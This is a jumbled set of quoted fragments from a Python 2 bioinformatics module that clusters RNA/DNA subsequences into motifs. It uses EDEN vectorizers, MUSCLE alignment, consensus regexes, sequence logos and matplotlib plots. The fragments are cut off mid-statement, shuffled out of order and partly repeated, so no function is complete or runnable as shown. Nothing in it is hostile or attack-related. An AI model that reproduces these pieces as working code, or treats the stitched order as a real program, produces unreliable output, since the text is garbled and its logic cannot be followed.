"= time.time() - start_time d_loc_time = time.time() - loc_start_time size = pos_data_matrix.shape logger.debug('%d",
"%d values' % (len(scores))) logger.debug('Optimal params: a:%.2f b:%.2f' % (self.a, self.b)) def predict(self,",
"i, p in enumerate(results): loc_start_time = time.time() subarrays_item = p.get() subarrays_items += subarrays_item",
"_perform_ma(self, data): params = {'maxiters': 7} if self.diags is True: params['diags'] = True",
"- a) / b)) class PValueEvaluator(object): \"\"\"Fit a parametrized sigmoid on the empirical",
"import izip import time from sklearn.base import BaseEstimator, ClassifierMixin from sklearn.linear_model import SGDClassifier",
"IUPAC.unambiguous_rna else: self.alphabet = IUPAC.unambiguous_dna def _seq_to_stdin_fasta(self, seqs): # seperating headers headers, instances",
"filter.') return motives else: logger.debug('After quality filter, %d motives' % len(_motives)) return _motives",
"== 'png': return wbl.png_formatter(data, format) elif self.output_format == 'png_print': return wbl.png_print_formatter(data, format) elif",
"motif['regex_seq'] logo_txt.append(info) return logo_image, logo_txt def compute_logos(self, motives, ids=None): \"\"\"compute_logos.\"\"\" if motives: if",
"new class definition logger.debug('After merge, %d motives' % len(motives)) return motives def quality_filter(self,",
"else: return False def compute_motif(self, seqs=None, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motif.\"\"\" ma",
"binary_preds, true_targets def serial_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10): \"\"\"serial_subarray.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator)",
"-1: pool = mp.Pool() else: pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_score,",
"% (subseq_seq) subseq = (header, seq) subseqs.append(subseq) subarrays_items += subseqs return subarrays_items def",
"(val, start, end, width)) for h, s in seqs: if s[start:end]: yield (h,",
"in range(half_windw_size, sig_len - half_windw_size): min_sig = np.min(sig[i - half_windw_size:i + half_windw_size]) if",
"def _fasta_to_seqs(self, headers, stdout): out = list(_fasta_to_fasta(stdout.split('\\n'))) motif_seqs = [''] * len(headers) for",
"y += [-1] * neg_data_matrix.shape[0] y = np.array(y) true_targets.append(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix])",
"import multiprocessing logger = logging.getLogger(__name__) def sigmoid(x, a, b): \"\"\"sigmoid.\"\"\" return 1 /",
"%s' % (regex_i, regex_j)) plt.xlabel('Relative position') plt.ylabel('Num occurrences') if fname: plt.draw() figname =",
"c = linkage(gram_matrix, method='single') orders = [] for id1, id2 in c[:, 0:2]:",
"in sorted([(motives[i]['freq'], i) for i in motives], reverse=True): info = '#### Motif id:",
"if fname: plt.draw() figname = '%s_dist_%d_vs_%d.png' % (fname, cluster_id_i, cluster_id_j) plt.savefig( figname, bbox_inches='tight',",
"p in enumerate(results): loc_start_time = time.time() pos_data_matrix = p.get() matrices += pos_data_matrix d_time",
"pos_seqs, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for freq, cluster_id in sorted([(motives[i]['freq'], i) for i",
"regex_th) counts, freq = occurrences(c_regex, seqs) yield freq, id, c_regex, counts, motives[id]['consensus_seq'] def",
"raise Exception('Error: No clusters.') mcs = min_cluster_size logger.debug('Alignment') motives = dict() for cluster_id",
"= header new_header += '<loc>' + str(begin) + ':' new_header += str(end) +",
"selected_abs == abs(c_i - c_j): selected = c_i - c_j distances[(i, j)].append(selected) cooccurence_mtx",
"color_scheme=color_scheme) logo_image = wb.create_logo(seqs=motif['trimmed_align_seqs']) logo_txt = [] info = ' - num subarrays:",
"= True if self.maxhours is not None: params['maxhours'] = self.maxhours muscle_cline = MuscleCommandline(**params)",
"d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time size = pos_data_matrix.shape",
"np.hstack(preds) binary_preds = np.hstack(binary_preds) true_targets = np.hstack(true_targets) return preds, binary_preds, true_targets def serial_subarray(iterable,",
"IUPAC.unambiguous_dna def _seq_to_stdin_fasta(self, seqs): # seperating headers headers, instances = [list(x) for x",
"self.class_estimator = class_estimator self.clusterer = clusterer self.clusterer_is_fit = False def save(self, model_name): \"\"\"save.\"\"\"",
"subarrays_items: components = self._decompose_header(header) orig_header, score, begin, end, subseq = components p =",
"len(cluster_seqs): orders.append(int(id2)) return orders def _compute_consensus_seq(self, align_seqs): cluster = [] for h, align_seq",
"[] for h, align_seq in trimmed_align_seqs: str_list = [c for c in align_seq]",
"n_i, j, n_j, rel_nw_score) info2 = ' deleting: %d [%d is now #%d]'",
"\"\"\"quality_filter.\"\"\" _motives = dict() for cluster_id in motives: regex_seq = motives[cluster_id]['regex_seq'] counts, freq",
"if locs: avg_loc = np.percentile(locs, 50) std_loc = np.percentile(locs, 70) - np.percentile(locs, 30)",
"self.a, self.b = popt else: logger.debug('Warning: reverting to default values') logger.debug('ECDF fit on",
"import numpy as np from scipy.sparse import vstack from eden.util.iterated_maximum_subarray import compute_max_subarrays_sequence from",
"[apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(iterable, pos_block_size)] logger.debug('Setup %.2f secs'",
"= wbl.LogoOptions() options.stacks_per_line = stacks_per_line options.sequence_type = sequence_type options.ignore_lower_case = ignore_lower_case options.unit_name =",
"import Vectorizer from StringIO import StringIO from Bio import SeqIO from Bio.Align.Applications import",
"function.\"\"\" xs = np.sort(x) ys = np.arange(1, len(xs) + 1) / float(len(xs)) return",
"consensus_regex(motives[id]['trimmed_align_seqs'], regex_th) counts, freq = occurrences(c_regex, seqs) yield freq, id, c_regex, counts, motives[id]['consensus_seq']",
"logo_image, logo_txts = self.compute_logo( cluster_id, motif=motives[cluster_id]) figname = self._save_logo(logo_image, cluster_id, fname) for logo_txt",
"align_seqs): cluster = [] for h, align_seq in align_seqs: str_list = [c for",
"cluster_id=cluster_id, motif=motives[cluster_id]) logos[cluster_id] = (logo_image, logo_txt) return logos else: logger.warning( 'No logo to",
"i in motives: for j in motives: if j > i: seq_i =",
"# roc logger.info('ROC: %.3f' % (metrics.roc_auc_score(y_test, y_pred))) except Exception as e: logger.debug('Failed iteration.",
"concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) score = 0 to_be_removed =",
"motif=motives[cluster_id]) logos[cluster_id] = (logo_image, logo_txt) return logos else: logger.warning( 'No logo to compute.",
"for letter, count in k: if count / float(size) > regex_th: if letter",
"+ '|'.join(code) + ')' return code_str def consensus_regex(trimmed_align_seqs, regex_th): \"\"\"consensus_regex.\"\"\" cluster = []",
"sep.join(seqs) cluster_seqs.append(seq) # vectorize the seqs and compute their gram matrix K cluster_vecs",
"1] width = end - start val = sum(sig[start:end]) yield val, start, end,",
"['dna', 'rna', 'protein'] ): \"\"\"Initialize an instance.\"\"\" self.diags = diags self.maxiters = maxiters",
"end, i)) distances = defaultdict(list) size = max(id for id in motives) +",
"seq = \"\" line_str = str(line) yield line_str.strip() else: line_str = line.split() if",
"motives, ids=None): \"\"\"compute_logos.\"\"\" if motives: if ids is None: ids = [cluster_id for",
"regex_th=regex_th, sample_size=sample_size) motives = self.merge( motives, similarity_th=similarity_th, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives",
"a motif finder algorithm. @author: <NAME> @email: <EMAIL> \"\"\" import logging import multiprocessing",
"cluster_id) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None plt.show() plt.close() return",
"chunks(pos_iterable, pos_block_size)] neg_results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(neg_iterable,",
"= (header, seq) subseqs.append(subseq) subarrays_items += subseqs return subarrays_items def multiprocess_subarray(iterable, vectorizer=None, estimator=None,",
"data_matrix = vstack([pos_data_matrix, neg_data_matrix]) pred = estimator.decision_function(data_matrix) preds.append(pred) binary_pred = estimator.predict(data_matrix) binary_preds.append(binary_pred) d_time",
"time.time() subarrays_item = p.get() subarrays_items += subarrays_item d_time = time.time() - start_time d_loc_time",
"(begin, end) header += '<score>%.4f<score>' % (score) header += '<subseq>%s<subseq>' % (subseq_seq) subseq",
"= vectorizer.annotate(iterable, estimator=estimator) scores = [score for seq, score in annotated_seqs] return scores",
"from Bio import SeqIO from Bio.Align.Applications import MuscleCommandline from Bio.Alphabet import IUPAC from",
"if self.diags is True: params['diags'] = True if self.maxhours is not None: params['maxhours']",
"code_str = '(' + '|'.join(code) + ')' return code_str def consensus_regex(trimmed_align_seqs, regex_th): \"\"\"consensus_regex.\"\"\"",
"end = tokens[1].split(':') yield (seq_id, int(begin), int(end), i) def compute_cooccurence(motives, ids=None): \"\"\"compute_cooccurence.\"\"\" if",
"iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def _order_clusters(self, clusters, complexity=3): sep =",
"%s (%.2f secs) (delta: %.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join() preds",
"std_loc = np.percentile(locs, 70) - np.percentile(locs, 30) else: avg_loc = -1 std_loc =",
"block_size=100, n_jobs=-1): \"\"\"multiprocess_score.\"\"\" start_time = time.time() if n_jobs == -1: pool = mp.Pool()",
"2 locs.append(m) if locs: avg_loc = np.percentile(locs, 50) std_loc = np.percentile(locs, 70) -",
"% (val, start, end, width)) for h, s in seqs: if s[start:end]: yield",
"= c.most_common() code = '' for i, row in enumerate(cluster.T): c = Counter(row)",
"self.maxhours muscle_cline = MuscleCommandline(**params) stdout, stderr = muscle_cline(stdin=data) return stdout def _fasta_to_seqs(self, headers,",
"'|'.join(code) + ')' return code_str def consensus_regex(trimmed_align_seqs, regex_th): \"\"\"consensus_regex.\"\"\" cluster = [] for",
"plt.grid() plt.title(needle) plt.xlabel('Position') plt.ylabel('Num occurrences') if fname: plt.draw() figname = '%s_loc_%d.png' % (fname,",
"min_cluster_size logger.debug('Alignment') motives = dict() for cluster_id in clusters: start_time = time.time() #",
"margin=1, output='all') subseqs = [] for subarray in subarrays: subseq_seq = subarray['subarray_string'] begin",
"y = np.array(y) true_targets.append(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) pred = estimator.decision_function(data_matrix) preds.append(pred) binary_pred",
"(cluster_id, len(clusters[cluster_id]), dtime)) logger.debug('After motives computation, %d motives' % len(motives)) return motives def",
"wbl.jpeg_formatter(data, format) else: return wbl.eps_formatter(data, format) # ------------------------------------------------------------------------------ class SequenceMotifDecomposer(BaseEstimator, ClassifierMixin): \"\"\"SequenceMotifDecomposer.\"\"\" def",
"start, end, width = max(box_decomposition(sig, half_windw_size)) logger.debug('val:%.1f beg:%s end:%s width:%s' % (val, start,",
"100%\"></p>') else: txt.append('<p align=\"left\"><img src=\"' + fname + '\" style=\"width: 100%\"></p>') else: if",
"motives=None, freq_th=None, std_th=None): \"\"\"quality_filter.\"\"\" _motives = dict() for cluster_id in motives: regex_seq =",
"if count / float(size) > regex_th: if letter != '-': code.append(letter) if len(code)",
"regex_i, j, regex_j, len(ds)) txt.append(info) if len(ds): figname = plot_distance( cluster_id, j, regex_i,",
"from StringIO import StringIO from Bio import SeqIO from Bio.Align.Applications import MuscleCommandline from",
"score') if fname: plt.draw() figname = '%s_importance.png' % (fname) plt.savefig( figname, bbox_inches='tight', transparent=True,",
"= n.get() y += [-1] * neg_data_matrix.shape[0] y = np.array(y) true_targets.append(y) data_matrix =",
"sequence_type='dna', # ['protein','dna','rna'] ignore_lower_case=False, # ['bits','nats','digits','kT','kJ/mol','kcal/mol','probability'] units='bits', first_position=1, logo_range=list(), # composition = 'auto',",
"options.logo_start = logo_range[0] options.logo_end = logo_range[1] options.scale_width = scale_stack_widths options.show_errorbars = error_bars if",
"')[0].split('>')[1]) motif_seqs[id] = out[i + 1] return zip(headers, motif_seqs) def transform(self, seqs=[]): \"\"\"Carry",
"self.b = -4, 1 scores = [score for header, score, begin, end, subseq",
"time.time() matrices = [] for i, p in enumerate(results): loc_start_time = time.time() pos_data_matrix",
"for h, align_seq in align_seqs: trimmed_align_seq = [a for i, a in enumerate(align_seq)",
"src=\"file://' + url + '\"></p>') else: txt.append('<p align=\"left\"><img src=\"' + fname + '\"></p>')",
"dont interfere cluster_seqs = [] for cluster_id in clusters: if len(clusters[cluster_id]) > 0:",
"self.compute_logo( cluster_id=cluster_id, motif=motives[cluster_id]) logos[cluster_id] = (logo_image, logo_txt) return logos else: logger.warning( 'No logo",
"txt.append(logo_txt) co = motives[cluster_id]['counts'] fr = motives[cluster_id]['freq'] info = ' - num occurrences",
"begin, end = tokens[1].split(':') yield (seq_id, int(begin), int(end), i) def compute_cooccurence(motives, ids=None): \"\"\"compute_cooccurence.\"\"\"",
"class definition logger.debug('After merge, %d motives' % len(motives)) return motives def quality_filter(self, seqs=None,",
"cluster.append(concat_str) cluster = np.vstack(cluster) size = len(trimmed_align_seqs) for i, row in enumerate(cluster.T): c",
"= IUPAC.unambiguous_rna else: self.alphabet = IUPAC.unambiguous_dna def _seq_to_stdin_fasta(self, seqs): # seperating headers headers,",
"motives motives[i] = motif del motives[j] success = True if success is False:",
"x in zip(*seqs)] if self.options.sequence_type is 'rna': alphabet = Alphabet('ACGU') elif self.options.sequence_type is",
"motives: regex_seq = motives[cluster_id]['regex_seq'] counts, freq = occurrences(regex_seq, seqs) motives[cluster_id]['freq'] = freq motives[cluster_id]['counts']",
"= consensus_regex(motives[id]['trimmed_align_seqs'], regex_th) counts, freq = occurrences(c_regex, seqs) yield freq, id, c_regex, counts,",
"s in motives[i]['seqs']: tokens = h.split('<loc>') seq_id = tokens[0] begin, end = tokens[1].split(':')",
"i in hits(motives, ids=ids): seqs_summary[seq_id].append((begin, end, i)) distances = defaultdict(list) size = max(id",
"+ 1] return zip(headers, motif_seqs) def transform(self, seqs=[]): \"\"\"Carry out alignment.\"\"\" headers, data",
">= 0] = 0 plt.bar(range(len(sign)), sign, alpha=0.3, color='r') plt.grid() plt.xlabel('Position') plt.ylabel('Importance score') if",
"instances = [list(x) for x in zip(*seqs)] instances_seqrecord = [] for i, j",
"p, subseq in iterable: new_header = header new_header += '<loc>' + str(begin) +",
"= clusterer self.clusterer_is_fit = False def save(self, model_name): \"\"\"save.\"\"\" joblib.dump(self, model_name, compress=1) def",
"+= str(end) + '<loc>' subsequences.append((new_header, subseq)) if not subsequences: raise Exception('No subarray was",
"motif = self.compute_motif( seqs=clusters[cluster_id], min_score=min_score, min_freq=min_freq, min_cluster_size=mcs, regex_th=regex_th, sample_size=sample_size) if is_high_quality: motives[cluster_id] =",
"= motif del motives[j] success = True if success is False: break #",
"header += '<subseq>%s<subseq>' % (subseq_seq) subseq = (header, seq) subseqs.append(subseq) subarrays_items += subseqs",
"start, end, width)) for h, s in seqs: if s[start:end]: yield (h, s[start:end])",
"= vstack([pos_data_matrix, neg_data_matrix]) estimator.partial_fit(data_matrix, y, classes=classes) d_time = time.time() - start_time d_loc_time =",
"std <= std_th: _motives[cluster_id] = motives[cluster_id] if len(_motives) == 0: logger.warning('Quality filter is",
"float(len(xs)) return xs, ys def letter_regex(k, size, regex_th=0.3): \"\"\"letter_regex.\"\"\" code = [] for",
"logger.warning( 'No motives to report. Try more permissive parameters.') txt = '\\n'.join(txt) return",
"min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs) for header, seq in subarrays_items: components = self._decompose_header(header) orig_header,",
"Counter(row) k = c.most_common() code = '' for i, row in enumerate(cluster.T): c",
"for h, s in motives[i]['seqs']: tokens = h.split('<loc>') seq_id = tokens[0] begin, end",
"median_len: logger.debug('Length mismatch: %d != %d' % (len(sig), median_len)) if sigs is None:",
"instances_seqrecord = [] for i, j in enumerate(instances): instances_seqrecord.append( SeqRecord(Seq(j, self.alphabet), id=str(i))) handle",
"n_jobs=-1): \"\"\"multiprocess_subarray.\"\"\" start_time = time.time() if n_jobs == -1: pool = mp.Pool() else:",
"try: subarrays_items = multiprocess_subarray( seqs, vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs) for header,",
"\"\"\"Initialize an instance.\"\"\" self.diags = diags self.maxiters = maxiters self.maxhours = maxhours if",
"time.time() self.clusterer.set_params(n_clusters=self.n_clusters) if self.clusterer_is_fit: preds = self.class_estimator.predict(data_matrix) else: preds = self.clusterer.fit_predict(data_matrix) self.class_estimator.fit(data_matrix, preds)",
"\"\"\"Initialize an instance.\"\"\" options = wbl.LogoOptions() options.stacks_per_line = stacks_per_line options.sequence_type = sequence_type options.ignore_lower_case",
"e) logger.debug('Exception', exc_info=True) def decomposition_scores(self, seqs=None): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray( seqs, vectorizer=self.vectorizer,",
"if len(ds): figname = plot_distance( cluster_id, j, regex_i, regex_j, distances, nbins=nbins, size=size, fname=fname)",
"Reason: %s' % e) logger.debug('Exception', exc_info=True) def _decompose_header(self, header): score = header.split('<score>')[1] score",
"Alphabet, SeqList import weblogolib as wbl from scipy.cluster.hierarchy import linkage import regex as",
"i, p in enumerate(results): loc_start_time = time.time() scores = p.get() scores_items += scores",
"in smod.score(seqs): sig = np.array(scores) if len(sig) != median_len: logger.debug('Length mismatch: %d !=",
"def compute_motives(self, clusters, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motives.\"\"\" if not clusters: raise",
"merge(self, motives, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"merge.\"\"\" while True: ms =",
"new_header += '<loc>' + str(begin) + ':' new_header += str(end) + '<loc>' subsequences.append((new_header,",
"ids=None): \"\"\"compute_cooccurence.\"\"\" if ids is None: ids = [id for id in motives]",
"yield self._decompose_header(header) except Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception',",
"ignore_lower_case options.unit_name = units options.first_index = first_position if logo_range: options.logo_start = logo_range[0] options.logo_end",
"l = letter_regex(k, size, regex_th=regex_th) if l: code += l return code def",
"multiprocessing as mp import os from collections import defaultdict from eden import apply_async",
"start_time = time.time() if n_jobs == -1: pool = mp.Pool() else: pool =",
"p in enumerate(results): loc_start_time = time.time() subarrays_item = p.get() subarrays_items += subarrays_item d_time",
"self.n_clusters = n_clusters self.min_subarray_size = min_subarray_size self.max_subarray_size = max_subarray_size self.pos_block_size = pos_block_size self.neg_block_size",
"= [] for h, align_seq in align_seqs: trimmed_align_seq = [a for i, a",
"= subarray['end'] score = subarray['score'] header = orig_header header += '<loc>%d:%d<loc>' % (begin,",
"%.2f secs' % (time.time() - start_time)) logger.debug('Vectorizing') start_time = time.time() matrices = []",
"y return p_val def ecdf(x): \"\"\"Empirical cumulative distribution function.\"\"\" xs = np.sort(x) ys",
"fname: plt.draw() figname = '%s_dist_%d_vs_%d.png' % (fname, cluster_id_i, cluster_id_j) plt.savefig( figname, bbox_inches='tight', transparent=True,",
"if id2 < len(cluster_seqs): orders.append(int(id2)) return orders def _compute_consensus_seq(self, align_seqs): cluster = []",
"not in to_be_removed] trimmed_align_seqs.append((h, ''.join(trimmed_align_seq))) return score, trimmed_align_seqs def _is_high_quality(self, seqs, min_score=4, min_freq=0.6,",
"= mp.Pool(n_jobs) results = [apply_async( pool, serial_score, args=(seqs, vectorizer, estimator)) for seqs in",
"begin = subarray['begin'] end = subarray['end'] score = subarray['score'] header = orig_header header",
"freq, cluster_id in sorted([(motives[i]['freq'], i) for i in motives], reverse=True): info = '",
"num co-occurences %d %s vs %d %s: %d' % \\ (cluster_id, regex_i, j,",
"if norm != 0: row /= norm else: row = np.zeros(row.shape) row[i] =",
"pos_data_matrix.shape[0] neg_data_matrix = n.get() y += [-1] * neg_data_matrix.shape[0] y = np.array(y) true_targets.append(y)",
"# ------------------------------------------------------------------------------ def _fasta_to_fasta(lines): seq = \"\" for line in lines: if line:",
"in motives] seqs_summary = defaultdict(list) for seq_id, begin, end, i in hits(motives, ids=ids):",
"'No logo to compute. Try more permissive parameters.') def _save_logo(self, logo, cluster_id, fname):",
"0: row /= norm else: row = np.zeros(row.shape) row[i] = 0 cooccurence_list.append(row) norm_cooccurence_mtx",
"- s) / 2 locs.append(m) plt.figure(figsize=size) n, bins, patches = plt.hist( locs, nbins,",
"self._decompose_header(header) except Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True)",
"end = loc.split(':') begin = int(begin) end = int(end) subseq = header.split('<subseq>')[1] orig_header",
"logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def fit_decomposition(self, seqs=None): \"\"\"fit_decomposition.\"\"\" self.a,",
"enumerate(results): loc_start_time = time.time() subarrays_item = p.get() subarrays_items += subarrays_item d_time = time.time()",
"seqs, size=(6, 2), fname=None): \"\"\"plot_cumulative_score.\"\"\" sig = cumulative_score(seqs, smod) plt.figure(figsize=size) sigp = np.copy(sig)",
"= [] for i, p in enumerate(results): loc_start_time = time.time() pos_data_matrix = p.get()",
"args=(seqs, vectorizer, estimator, min_subarray_size, max_subarray_size)) for seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f secs'",
"e) logger.debug('Exception', exc_info=True) def score(self, seqs=None): \"\"\"fit.\"\"\" try: for score in multiprocess_score(seqs, vectorizer=self.vectorizer,",
"cluster = np.vstack(cluster) size = len(trimmed_align_seqs) for i, row in enumerate(cluster.T): c =",
"{'maxiters': 7} if self.diags is True: params['diags'] = True if self.maxhours is not",
"txt.append(info) av = motives[cluster_id]['avg_pos'] st = motives[cluster_id]['std_pos'] info = ' - average location:",
"loc.split(':') begin = int(begin) end = int(end) subseq = header.split('<subseq>')[1] orig_header = header.split('<loc>')[0]",
"\"\"\"serial_pre_process.\"\"\" data_matrix = vectorizer.transform(iterable) return data_matrix def chunks(iterable, n): \"\"\"chunks.\"\"\" iterable = iter(iterable)",
"clusters, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motives.\"\"\" if not clusters: raise Exception('Error: No",
"c.most_common() if k[0][0] == '-': to_be_removed.append(i) val = k[1][1] else: val = k[0][1]",
"= [] for letter, count in k: if count / float(size) > regex_th:",
"'-': code.append(letter) if len(code) == 0: code_str = None elif len(code) == 1:",
"= np.vstack(cluster) size = len(trimmed_align_seqs) for i, row in enumerate(cluster.T): c = Counter(row)",
"(e - s) / 2 locs.append(m) plt.figure(figsize=size) n, bins, patches = plt.hist( locs,",
"= pos_data_matrix.shape logger.debug('%d %s (%.2f secs) (delta: %.2f)' % (i, size, d_time, d_loc_time))",
"code_str def consensus_regex(trimmed_align_seqs, regex_th): \"\"\"consensus_regex.\"\"\" cluster = [] for h, align_seq in trimmed_align_seqs:",
"logger.debug('Optimal params: a:%.2f b:%.2f' % (self.a, self.b)) def compute_p_value(self, value): \"\"\"p_value.\"\"\" y =",
"bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None plt.show() plt.close() return figname # ------------------------------------------------------------------------------",
"j, regex_i, regex_j, distances, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image( figname, output_type=output_type)) txt.append('_' * 100)",
"= self._fasta_to_seqs(headers, stdout) return aligned_seqs # ------------------------------------------------------------------------------ class Weblogo(object): \"\"\"A wrapper of weblogolib",
"logo_txt in logo_txts: txt.append(logo_txt) co = motives[cluster_id]['counts'] fr = motives[cluster_id]['freq'] info = '",
"norm else: row = np.zeros(row.shape) row[i] = 0 cooccurence_list.append(row) norm_cooccurence_mtx = np.vstack(cooccurence_list) return",
"subarrays_items = multiprocess_subarray( seqs, vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs) for header, seq",
"maxiters=16, maxhours=None, # TODO: check if this alphabet is required # it over-rides",
"if ids is None: ids = [cluster_id for cluster_id in motives] logos =",
"ids=ids): seqs_summary[seq_id].append((begin, end, i)) distances = defaultdict(list) size = max(id for id in",
"headers, instances = [list(x) for x in zip(*seqs)] if self.options.sequence_type is 'rna': alphabet",
"logger.info('Classification:') logger.info(metrics.classification_report(y_test, y_binary)) # roc logger.info('ROC: %.3f' % (metrics.roc_auc_score(y_test, y_pred))) except Exception as",
"distribution function.\"\"\" xs = np.sort(x) ys = np.arange(1, len(xs) + 1) / float(len(xs))",
"trimmed_align_seqs: str_list = [c for c in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str)",
"for i in motives: for j in motives: if j > i: seq_i",
"= [] true_targets = [] for i, (p, n) in enumerate(izip(pos_results, neg_results)): loc_start_time",
"def predict(self, value): \"\"\"pvalue.\"\"\" y = sigmoid(value, self.a, self.b) p_val = 1 -",
"np.vstack(cooccurence_list) return orig_cooccurence_mtx, norm_cooccurence_mtx, distances def plot_distance(cluster_id_i, cluster_id_j, regex_i, regex_j, distances, nbins=5, size=(6,",
"sig = np.array(sigs) / float(len(seqs)) return sig def trim_seqs(seqs, smod, half_windw_size=7): \"\"\"trim_seqs.\"\"\" sig",
"[] for (orig_header, orig_seq), (seq, score) in zip(iterable, annotated_seqs): subarrays = compute_max_subarrays_sequence( seq=seq,",
"= len(align_seqs) cluster = [] for h, align_seq in align_seqs: str_list = [c",
"cluster_id=None, motif=None): \"\"\"compute_logo.\"\"\" alphabet = 'rna' color_scheme = 'classic' wb = Weblogo(output_format='png', sequence_type=alphabet,",
"true_targets = [] for i, (p, n) in enumerate(izip(pos_results, neg_results)): loc_start_time = time.time()",
"header.split('<loc>')[0] return orig_header, score, begin, end, subseq def decompose(self, seqs=None, p_value=0.05): \"\"\"decomposition_scores.\"\"\" try:",
"concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) seq = '' for i,",
"%d' % (len(sig), median_len)) if sigs is None: if len(sig) >= median_len: sigs",
"for i, p in enumerate(results): loc_start_time = time.time() subarrays_item = p.get() subarrays_items +=",
"= defaultdict(list) size = max(id for id in motives) + 1 cooccurence_mtx =",
"self except Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True)",
"logo_range[0] options.logo_end = logo_range[1] options.scale_width = scale_stack_widths options.show_errorbars = error_bars if title: options.title",
"cluster_id in sorted([(motives[i]['freq'], i) for i in motives], reverse=True): info = ' -",
"+ (end - begin) / 2) cluster_ids = set(cluster_ids) for i in cluster_ids:",
"= [apply_async( pool, serial_score, args=(seqs, vectorizer, estimator)) for seqs in chunks(iterable, block_size)] logger.debug('Setup",
"corebio.seq import Alphabet, SeqList import weblogolib as wbl from scipy.cluster.hierarchy import linkage import",
"motives def quality_filter(self, seqs=None, motives=None, freq_th=None, std_th=None): \"\"\"quality_filter.\"\"\" _motives = dict() for cluster_id",
"% e) logger.debug('Exception', exc_info=True) def _decompose_header(self, header): score = header.split('<score>')[1] score = float(score)",
"return stdout def _fasta_to_seqs(self, headers, stdout): out = list(_fasta_to_fasta(stdout.split('\\n'))) motif_seqs = [''] *",
"max_subarray_size=max_subarray_size, margin=1, output='all') subseqs = [] for subarray in subarrays: subseq_seq = subarray['subarray_string']",
"seqs_summary = defaultdict(list) for seq_id, begin, end, i in hits(motives, ids=ids): seqs_summary[seq_id].append((begin, end,",
"(%.2f secs) (delta: %.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join() return estimator",
"secs) (delta: %.2f)' % (i, d_time, d_loc_time)) pool.close() pool.join() return subarrays_items def serial_score(iterable,",
"id=str(i))) handle = StringIO() SeqIO.write(instances_seqrecord, handle, \"fasta\") data = handle.getvalue() return headers, data",
"# composition = 'auto', scale_stack_widths=True, error_bars=True, title='', figure_label='', show_x_axis=True, x_label='', show_y_axis=True, y_label='', y_axis_tic_spacing=1.0,",
"SeqIO from Bio.Align.Applications import MuscleCommandline from Bio.Alphabet import IUPAC from Bio.Seq import Seq",
"False def compute_motif(self, seqs=None, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motif.\"\"\" ma = MuscleAlignWrapper(alphabet='rna')",
"= sum(sig[start:end]) yield val, start, end, width def cumulative_score(seqs, smod): \"\"\"cumulative_score.\"\"\" median_len =",
"= '%s_logo_cl_%d.png' % (fname, cluster_id) with open(imagename, 'wb') as f: f.write(logo) return imagename",
"self.compute_clusters(seqs, p_value=p_value) motives = self.compute_motives( orig_clusters, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives =",
"- consensus sequence: %s' % motif['consensus_seq'] logo_txt.append(info) info = ' - consensus regex:",
"1 def ecdf(self, x): \"\"\"Empirical cumulative distribution function.\"\"\" xs = np.sort(x) ys =",
"as mp import os from collections import defaultdict from eden import apply_async import",
"= np.vstack(cluster) seq = '' for i, row in enumerate(cluster.T): c = Counter(row)",
"plt.figure(figsize=size) n, bins, patches = plt.hist( ds, nbins, normed=0, facecolor='green', alpha=0.3) plt.grid() plt.title('%s",
"------------------------------------------------------------------------------ def _fasta_to_fasta(lines): seq = \"\" for line in lines: if line: if",
"seqs, vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs) for header, seq in subarrays_items: yield",
"is None: if len(sig) >= median_len: sigs = sig[:median_len] else: if len(sig) >=",
"for m in self._identify_mergeable_clusters( motives, similarity_th=similarity_th)], reverse=True) success = False for rel_nw_score, i,",
"\"\"\"serial_score.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) scores = [score for seq, score in annotated_seqs]",
"find closest instance j from any instance in i d_ij = [] for",
"logger.warning( 'No logo to compute. Try more permissive parameters.') def _save_logo(self, logo, cluster_id,",
